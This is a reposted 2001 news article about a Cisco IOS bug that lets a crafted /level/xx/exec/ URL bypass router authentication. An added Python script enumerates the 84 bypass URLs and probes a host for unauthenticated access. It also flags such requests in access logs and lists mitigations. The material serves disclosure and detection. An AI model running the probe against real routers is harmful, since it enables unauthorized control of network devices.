Cisco Router Bug Threatens Net Security

By Matthew Broersma, ZDNet (UK) June 29, 2001 1:35 PM ET

Cisco Systems and CERT, the security advisory organization, have warned of a bug in Cisco routers and switches. The glitch could give a hacker the ability to disrupt Internet traffic or intercept sensitive information.

The bug, disclosed on Thursday, allows a malicious user to gain control of Cisco routers and switches running IOS software. It affects all releases of IOS, the operating system on most of Cisco's products, from version 11.3 onward, and "virtually all" mainstream Cisco routers and switches that run it.

The vulnerability requires little skill to exploit: A malicious user can simply send a crafted URL and commands will be executed on the router or switch.

The bug allows an attacker to take control of routers at the highest privilege level, level 15, without authorization. Routers are devices that control how data moves around the Internet; with such unauthorized control, hackers can stop Internet traffic, intercept information such as passwords and credit card numbers, or redirect traffic bound for one Web site to another.

Cisco said that when the device's HTTP server is enabled and users are authenticated against the router's local user database, it is possible for a hacker to bypass authentication and exercise complete control over the router.

The company is recommending that the HTTP server on routers be disabled. The problem can also be sidestepped by using Terminal Access Controller Access Control System Plus (TACACS+) or RADIUS for authentication instead of the local database.

According to Cisco, the crafted URL used to exploit the bug takes the form http://<router address>/level/xx/exec/..., where xx is a number between 16 and 99.

The same URL will not be effective on every device; which value of xx works depends on the combination of hardware and software release. But since there are only 84 values to try, they could all be tested in a short space of time, Cisco said.
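As an added illustration of the two paragraphs above (this code is not from the article, from Cisco, or from the original poster), the script below enumerates the 84 crafted paths, classifies a device's unauthenticated responses to them, and matches the same path pattern in web-server access logs so an operator can spot probing. Everything beyond the URL form and the 16-99 range is an assumption: the "show/version/CR" suffix is a hypothetical command path (the article only shows "exec/..."), the fetch callable is injected so the block runs offline, and the mock device and log lines are constructed for this example.

```python
"""Enumerate, probe and detect the /level/xx/exec/... bypass URLs.

Added example, not code from the ZDNet article or from Cisco.
Assumptions (not stated by the article): an unauthenticated GET that is
answered with HTTP 200 instead of 401 means the level number was accepted;
the probe suffix, mock device and sample log lines are constructed here.
"""
import re
from typing import Callable, Iterable, List, Set

LEVEL_MIN, LEVEL_MAX = 16, 99           # the range the article gives: 84 values
PROBE_SUFFIX = "exec/show/version/CR"   # hypothetical; the article only shows "exec/..."


def candidate_paths(suffix: str = PROBE_SUFFIX) -> List[str]:
    """All 84 /level/NN/exec/... paths, one per privilege number 16..99."""
    return [f"/level/{level}/{suffix}" for level in range(LEVEL_MIN, LEVEL_MAX + 1)]


def probe(host: str, fetch: Callable[[str], int], suffix: str = PROBE_SUFFIX) -> List[int]:
    """Return the level numbers whose URL the device served (HTTP 200) with no credentials.

    `fetch` takes a URL and returns the HTTP status code; it is injected so the
    same logic can be driven by a real HTTP client or, as below, by a mock.
    """
    hits: List[int] = []
    for level in range(LEVEL_MIN, LEVEL_MAX + 1):
        if fetch(f"http://{host}/level/{level}/{suffix}") == 200:
            hits.append(level)
    return hits


# Detection side: the same path shape, as it would appear in an access log.
EXPLOIT_PATH = re.compile(r"^/level/(\d{1,2})/exec(?:/|$)")
REQUEST_LINE = re.compile(r'"(?:GET|POST) (\S+)')


def is_exploit_request(path: str) -> bool:
    """True for /level/NN/exec... with NN in 16..99 (levels 0-15 are normal use)."""
    m = EXPLOIT_PATH.match(path)
    return bool(m) and LEVEL_MIN <= int(m.group(1)) <= LEVEL_MAX


def flag_log_lines(lines: Iterable[str]) -> List[str]:
    """Return the access-log lines whose request path matches the bypass pattern."""
    flagged = []
    for line in lines:
        m = REQUEST_LINE.search(line)
        if m and is_exploit_request(m.group(1)):
            flagged.append(line)
    return flagged


def make_mock_fetch(open_levels: Set[int]) -> Callable[[str], int]:
    """Constructed stand-in for a device: 200 for the listed levels, 401 otherwise."""
    def fetch(url: str) -> int:
        m = re.search(r"/level/(\d+)/", url)
        return 200 if m and int(m.group(1)) in open_levels else 401
    return fetch


# Constructed sample log lines (common log format), not real traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [29/Jun/2001:13:35:00 +0000] "GET /level/15/exec/show/running-config HTTP/1.0" 401 0',
    '10.0.0.5 - - [29/Jun/2001:13:35:01 +0000] "GET /level/16/exec/show/running-config HTTP/1.0" 401 0',
    '10.0.0.5 - - [29/Jun/2001:13:35:02 +0000] "GET /level/27/exec/show/running-config HTTP/1.0" 200 1432',
    '10.0.0.9 - - [29/Jun/2001:13:36:00 +0000] "GET /index.html HTTP/1.0" 200 512',
]

if __name__ == "__main__":
    # A hypothetical device that accepts level 27 without credentials.
    vulnerable = make_mock_fetch({27})
    print("paths to try:", len(candidate_paths()))
    print("levels served without auth:", probe("192.0.2.1", vulnerable))
    for line in flag_log_lines(SAMPLE_LOG):
        print("suspicious:", line)
```

Run against a real device only with authorization; in that case replace the mock with a fetch function that performs the GET without credentials and returns the status code. The article's two workarounds map to IOS configuration as `no ip http server` (disable the server outright) or, where the web interface must stay up, `ip http authentication aaa` with AAA pointed at a TACACS+ or RADIUS server rather than the local user database; the upgrade is the real fix.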

Cisco said it has not had any reports of the bug being exploited. It was originally reported by independent users.

The company said it is providing a software upgrade to fix the problem, which will be available on its Web site.

http://www.zdnet.com/intweek/stories/news/0,4164,2781357,00.html

-- Martin Thompson (mthom1927@aol.com), June 29, 2001
